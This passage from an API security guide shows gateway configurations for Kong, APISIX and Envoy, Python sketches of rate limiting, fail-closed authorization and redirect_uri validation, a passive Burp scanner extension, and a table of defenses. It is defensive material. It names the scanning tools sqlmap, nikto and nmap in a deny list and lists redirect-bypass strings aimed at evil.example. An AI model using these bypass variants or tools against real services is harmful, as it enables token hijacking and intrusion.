            - Content-Type
          max_age: 3600

      # JWT validation
      - name: jwt
        config:
          claims_to_verify:
            - exp

      # Bot detection
      - name: bot-detection
        config:
          deny:
            - "sqlmap"
            - "nikto"
            - "nmap"

      # IP restriction
      - name: ip-restriction
        config:
          allow:
            - 10.0.0.0/8
            - 172.16.0.0/12
            - 192.168.0.0/16

      # OAuth2 authentication
      - name: oauth2
        config:
          scopes:
            - read
            - write
            - admin
          mandatory_scope: true
          token_expiration: 3600
          enable_client_credentials: true
          hide_token_hash: true

APISIX Security Configuration
#

# APISIX security configuration
routes:
  - uri: /api/*
    plugins:
      jwt-auth:
        secret: "${JWT_SECRET}"
        algorithm: HS256

      limit-req:
        rate: 100
        burst: 200
        key: remote_addr
        rejected_code: 429

      cors:
        allow_origins: "https://app.techorigin.dev"
        allow_methods: "GET,POST,PUT,DELETE"
        allow_headers: "Authorization,Content-Type,X-Request-ID"

      request-id:
        header_name: "X-Request-ID"
        include_in_response: true

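      # fault-injection belongs in test environments only. Enabled as written
      # below, it would abort every matching request with HTTP 500, so it is
      # left commented out here.
      # fault-injection:
      #   abort:
      #     http_status: 500
      #     body: '{"error":"test"}'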

      response-rewrite:
        headers:
          X-Frame-Options: "DENY"
          X-Content-Type-Options: "nosniff"
          Strict-Transport-Security: "max-age=31536000; includeSubDomains"
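
The `rate` and `burst` values in `limit-req` follow leaky-bucket semantics: traffic above `rate` is delayed, and traffic that exceeds `rate` by more than `burst` is rejected with `rejected_code`. The sketch below is a simplified, single-key model of that behavior, based on my understanding of the leaky-bucket algorithm APISIX builds on. The `LeakyBucket` class and its method names are hypothetical, and the real plugin keeps one bucket per `key` value in shared memory.

```python
class LeakyBucket:
    """Simplified single-key model of leaky-bucket request limiting."""

    def __init__(self, rate, burst):
        self.rate = float(rate)    # sustained requests per second
        self.burst = float(burst)  # extra requests tolerated above rate
        self.excess = 0.0          # backlog carried over from earlier requests
        self.last = None           # timestamp of the last accepted request

    def incoming(self, now):
        """Return the delay in seconds for an accepted request, or None if rejected."""
        if self.last is None:
            excess = 0.0
        else:
            elapsed = abs(now - self.last)
            # The backlog drains at `rate` per second; this request adds one unit.
            excess = max(self.excess - self.rate * elapsed + 1.0, 0.0)
        if excess > self.burst:
            return None  # over rate + burst: reject (HTTP 429 in the config above)
        self.excess = excess
        self.last = now
        return excess / self.rate


if __name__ == "__main__":
    bucket = LeakyBucket(rate=100, burst=200)
    decisions = [bucket.incoming(0.0) for _ in range(205)]
    print("rejected:", decisions.count(None))
```

Rejected requests do not change the bucket state in this model, so a client that keeps hammering the endpoint does not push its own recovery further out.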

Envoy Security Filter Chain

# envoy.yaml - Secure Envoy proxy configuration
static_resources:
  listeners:
    - name: api_listener
      address:
        socket_address:
          address: 0.0.0.0
          port_value: 8443
      filter_chains:
        - filters:
            - name: envoy.filters.network.http_connection_manager
              typed_config:
                "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
                stat_prefix: ingress_https
                codec_type: AUTO
                route_config:
                  name: local_route
                  virtual_hosts:
                    - name: api
                      domains: ["api.techorigin.dev"]
                      routes:
                        - match:
                            prefix: "/api/"
                          route:
                            cluster: api_backend
                            timeout: 30s
                            retry_policy:
                              retry_on: "5xx"
                              num_retries: 3
                      response_headers_to_add:
                        - header:
                            key: "X-Frame-Options"
                            value: "DENY"
                        - header:
                            key: "X-Content-Type-Options"
                            value: "nosniff"
                        - header:
                            key: "Strict-Transport-Security"
                            value: "max-age=31536000; includeSubDomains"
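                        # The legacy XSS auditor is gone from modern browsers;
                        # current guidance is to disable it explicitly and rely on CSP.
                        - header:
                            key: "X-XSS-Protection"
                            value: "0"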
                http_filters:
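                  # External authorization (JWT validation is delegated to an external service)
                  - name: envoy.filters.http.ext_authz
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.ext_authz.v3.ExtAuthz
                      transport_api_version: V3
                      failure_mode_allow: false
                      grpc_service:
                        envoy_grpc:
                          cluster_name: ext_authz  # assumed name; define it under clusters
                      with_request_body:
                        allow_partial: true
                        max_request_bytes: 8192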
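                  # Rate limiting
                  - name: envoy.filters.http.ratelimit
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.ratelimit.v3.RateLimit
                      domain: api_ratelimit
                      timeout: 10ms
                      rate_limit_service:
                        transport_api_version: V3
                        grpc_service:
                          envoy_grpc:
                            cluster_name: rate_limit  # assumed name; define it under clusters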
                  # RBAC
                  - name: envoy.filters.http.rbac
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.rbac.v3.RBAC
                      rules:
                        policies:
                          "api-access":
                            permissions:
                              - header:
                                  name: ":path"
                                  string_match:
                                    prefix: "/api/"
                            principals:
                              - authenticated:
                                  principal_name:
                                    prefix: "spiffe://"
                  # Router
                  - name: envoy.filters.http.router
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router
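
The `failure_mode_allow: false` setting in the `ext_authz` filter makes the proxy fail closed: if the authorization service errors out or cannot be reached, the request is denied rather than waved through. The sketch below illustrates that decision logic in plain Python. It is not Envoy code, and `authorize`, `check`, and the returned status codes are illustrative assumptions.

```python
from typing import Callable


def authorize(check: Callable[[dict], bool], request: dict,
              failure_mode_allow: bool = False) -> int:
    """Return the HTTP status a gateway would apply to `request`.

    `check` stands in for the call to an external authorization service
    and may raise when that service is down or times out.
    """
    try:
        allowed = check(request)
    except Exception:
        # Authorization backend failed: fail closed unless explicitly told otherwise.
        return 200 if failure_mode_allow else 403
    return 200 if allowed else 403


def broken_backend(request: dict) -> bool:
    raise TimeoutError("authorization service unreachable")


if __name__ == "__main__":
    req = {"path": "/api/orders", "token": "example"}
    print(authorize(broken_backend, req))                           # fail closed
    print(authorize(broken_backend, req, failure_mode_allow=True))  # fail open
```

Failing open keeps the API available during an outage of the authorization service, at the price of serving unauthenticated traffic, which is why the configuration above chooses to fail closed.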

Automated Scanning with Burp Suite

Burp Extension Script

"""
api_security_scanner.py - Burp Suite extension for automated API security testing
Implements custom scanner checks for OAuth2 and GraphQL vulnerabilities
"""

# Targets Burp's legacy Extender API under Jython 2.7, so only Python 2
# syntax is used (no f-strings).
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue


class BurpExtender(IBurpExtender):
    """Entry point: Burp loads the class named BurpExtender."""

    def registerExtenderCallbacks(self, callbacks):
        callbacks.setExtensionName("API Security Scanner")
        callbacks.registerScannerCheck(
            APISecurityScanner(callbacks.getHelpers())
        )


class APISecurityScanner(IScannerCheck):
    """Custom Burp scanner check for API security issues."""

    def __init__(self, helpers):
        self._helpers = helpers

    def doActiveScan(self, baseRequestResponse, insertionPoint):
        # Every check in this extension is passive; nothing is injected.
        return None

    def doPassiveScan(self, baseRequestResponse):
        response = baseRequestResponse.getResponse()
        if response is None:
            return None

        issues = []
        url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
        response_info = self._helpers.analyzeResponse(response)

        def report(name, detail, severity, confidence):
            issues.append(
                CustomScanIssue(
                    baseRequestResponse.getHttpService(),
                    url,
                    [baseRequestResponse],
                    name,
                    detail,
                    severity,
                    confidence
                )
            )

        # Check 1: Missing security headers
        required_headers = {
            "Strict-Transport-Security": "Missing HSTS header",
            "X-Content-Type-Options": "Missing X-Content-Type-Options",
            "X-Frame-Options": "Missing X-Frame-Options",
        }

        # The first entry returned by getHeaders() is the status line; skip it
        # and compare header names only, not substrings of whole header lines.
        present = [
            h.split(":", 1)[0].strip().lower()
            for h in list(response_info.getHeaders())[1:]
        ]
        for header, desc in required_headers.items():
            if header.lower() not in present:
                report(header, desc, "Information", "Certain")

        # Check 2: OAuth token in URL
        # getUrl() returns a java.net.URL, so convert it before string matching.
        if "access_token=" in url.toString().lower():
            report(
                "access_token_in_url",
                "OAuth access token exposed in URL parameters",
                "High",
                "Firm"
            )

        # Check 3: Verbose error messages in API responses
        response_body = self._helpers.bytesToString(
            response[response_info.getBodyOffset():]
        ).lower()

        error_patterns = [
            "stack trace",
            "Traceback (most recent call last)",
            "at org.springframework",
            "at com.mongodb",
            "SQLSTATE",
            "java.lang.NullPointerException",
            "Internal Server Error",
            "PDOException",
        ]

        for pattern in error_patterns:
            if pattern.lower() in response_body:
                report(
                    "verbose_error",
                    "Verbose error message detected: '%s'" % pattern,
                    "Medium",
                    "Tentative"
                )
                break

        return issues if issues else None

    def _get_header(self, request_response, header_name):
        """Return the value of a request header, or None if it is absent."""
        headers = self._helpers.analyzeRequest(request_response).getHeaders()
        for h in headers:
            if h.lower().startswith(header_name.lower() + ":"):
                return h.split(":", 1)[1].strip()
        return None

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        # Burp expects an int: -1 keeps only the existing issue,
        # 0 keeps both, 1 keeps only the new issue.
        if existingIssue.getIssueName() == newIssue.getIssueName():
            return -1
        return 0


class CustomScanIssue(IScanIssue):
    """Custom scan issue implementation."""

    def __init__(self, http_service, url, http_messages,
                 issue_name, detail, severity, confidence):
        self._http_service = http_service
        self._url = url
        self._http_messages = http_messages
        self._name = issue_name
        self._detail = detail
        self._severity = severity
        self._confidence = confidence

    def getUrl(self):
        return self._url

    def getIssueName(self):
        return self._name

    def getIssueType(self):
        return 0x08000000  # Identifier for extension-generated issues

    def getSeverity(self):
        return self._severity

    def getConfidence(self):
        return self._confidence

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueDetail(self):
        return self._detail

    def getRemediationDetail(self):
        return "Fix the %s issue in the API response." % self._name

    def getHttpMessages(self):
        return self._http_messages

    def getHttpService(self):
        return self._http_service

Summary of Defensive Recommendations

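| Threat | Defense | How to verify |
| --- | --- | --- |
| OAuth redirect hijacking | Exact-match redirect_uri + PKCE | Test redirect_uri variants |
| Token leakage | Never pass tokens in URLs; short TTLs | Scan logs and code repositories |
| CSRF via the state parameter | Enforce state validation and bind it to the session | Replay with state omitted or modified |
| JWT algorithm attacks | Pin the accepted alg + isolate keys | alg:none injection test |
| GraphQL introspection leakage | Disable introspection in production | Send an introspection query |
| GraphQL DoS | Query depth and complexity limits | Deeply nested recursive query test |
| Rate limit bypass | Multi-dimensional limiting (IP + User + API Key) | Test the various IP-related headers |
| API information disclosure | Minimize response fields + uniform error format | Analyze error responses |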
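
As an illustration of the first row, the sketch below shows what exact-match `redirect_uri` validation can look like, together with a few of the redirect variants worth testing against it. It is a minimal sketch: the `REGISTERED_REDIRECTS` registry, the `client-123` identifier, the `/callback` path, and the `is_allowed_redirect` helper are hypothetical, and a real authorization server would load registrations from its client store.

```python
# Hypothetical client registry: client_id -> exact redirect URIs registered for it.
REGISTERED_REDIRECTS = {
    "client-123": {"https://app.techorigin.dev/callback"},
}


def is_allowed_redirect(client_id, redirect_uri, registry=REGISTERED_REDIRECTS):
    """Accept a redirect_uri only if it matches a registered value exactly.

    There is deliberately no prefix, wildcard, or normalization logic:
    each of those is a common source of redirect hijacking bugs.
    """
    return redirect_uri in registry.get(client_id, set())


# Variants that lenient matchers tend to let through.
BYPASS_ATTEMPTS = [
    "https://app.techorigin.dev/callback/../evil",
    "https://app.techorigin.dev.evil.example/callback",
    "https://app.techorigin.dev/callback?next=https://evil.example",
    "https://app.techorigin.dev/callback/",
    "http://app.techorigin.dev/callback",
]

if __name__ == "__main__":
    print(is_allowed_redirect("client-123", "https://app.techorigin.dev/callback"))
    for attempt in BYPASS_ATTEMPTS:
        print(attempt, is_allowed_redirect("client-123", attempt))
```

Exact string comparison is stricter than most matching schemes, so every legitimate callback has to be registered up front; that operational cost is what buys the protection.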

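The core principles of API security are: never trust client input, minimize the information you expose, and adopt a zero-trust architecture. A robust API security posture comes from combining continuous automated testing with manual audits that cover the logic flaws tools cannot detect.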